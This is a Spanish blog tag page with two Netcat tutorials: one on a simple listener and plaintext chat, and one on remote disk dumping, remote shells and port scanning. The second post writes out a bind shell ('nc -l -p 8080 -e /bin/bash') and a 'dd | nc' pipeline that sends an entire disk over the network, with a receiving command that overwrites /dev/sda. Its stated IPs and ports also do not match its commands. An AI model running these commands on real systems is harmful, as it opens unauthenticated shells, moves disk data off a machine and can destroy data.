Mostrando entradas con la etiqueta nc. Mostrar todas las entradas
Mostrando entradas con la etiqueta nc. Mostrar todas las entradas

viernes, 10 de junio de 2016

Ncat: Escaneando puertos, abriendo shells remotas & volcando discos remotos.








Seguimos con Netcat, esta vez vamos a ver tres puntos concretos como menciona el título de la entrada. En primer lugar veremos como podemos realizar un volcado de disco remoto, esto es aplicable a carpetas más concretas y demás. Cuando estamos dentro de un sistema remoto o simplemente queremos mandar un volcado del sistema nos basta con dejar una orden pendiente con Netcat y ejecutar en el ordenador que querámos la orden Netcat para recibir dicho volcado por ejemplo.

 En primero lugar ejecutamos la orden en el sistema que queremos extraer la información en este caso un sistema con ip "192.168.1.12" y aclaramos esa orden al puerto "8080". Sería como la siguiente orden.
dd if=/dev/sda | nc 192.168.0.1 9000
Una vez tenemos hecho esto ejecutamos la siguiente orden en el sistema que queramos volcar la información como muestra la siguiente orden.

nc -l -p 9000 | dd of=/dev/sda

Ahora tenemos el volcado de información en nuestro sistema. Netcat también nos ofrece la posibilidad de ejecutar shells remotas, es decir ejecutar una shell de otro sistema desde el nuestro con todo lo que ello conlleva. Lo que haremos es dejar en el sistema remoto un shell a la escucha mediante la orden "nc -l -p 8080 -e /bin/bash" y en el sistema donde queramos usar esa shell remota " nc direcionipremota 8080".



Por último veremos como escanear puertos mediante la orden "nc -v -w 1 localhost -z 1-3000". Donde escanearemos nuestro propio sistema en busca de puertos abiertos en este caso del 1-3000. En nuestro caso vemos que descubre un puerto abierto el 22.






Publicado por en
Etiquetas: , , , , , , , ,

jueves, 10 de marzo de 2016

Ncat: Abriendo puertos a la escucha e iniciar un chat.









Como mencionamos anteriormente, veríamos ejemplos sobre Netcat para ver lo que nos ofrece y en esta entrada en el blog comenzamos con ello. Lo primero antes de nada es decir el entorno que usaremos en adelante para las pruebas y ejemplos que no será mas que dos máquinas cliente/servidor con S.O. derivados de Debian, pero también usaremos entornos Windows para estos ejemplos.

 Hoy vamos a ver como podemos dejar a la escucha un puerto abierto para recibir conexiones o por ejemplo iniciar un chat entre ellos. Lo primero es ver la sintáxis de ncat. 

nc [-options] hostname port[s] [ports]
nc -l -p port [-options] [hostname] [port]

Ahora procederemos abrir el puerto que quedará a la escucha para el cliente mediante la orden "nc -l -p 8080" donde -l es listen(a la escucha) -p es el puerto en el que se quedará a la escucha y abierto( 8080). Una vez ejecutado ahora desde el cliente lanzaremos el comando para conectarnos al puerto en concreto "nc [ip del destino] 8080". Ahora en la siguiente imagen (a la izquierda el cliente y a la derecha el servidor) vemos como hemos entablado la conexión e iniciamos la conversación entre ambos. Como dato estas conversaciones van en texto en blanco sin ningún tipo de cifrado.




Es un primer ejemplo sencillo para que veamos la facilidad y potencial de Netcat.



Publicado por en
Etiquetas: , , , , , , , , , , , , , ,
Suscribirse a: Entradas (Atom)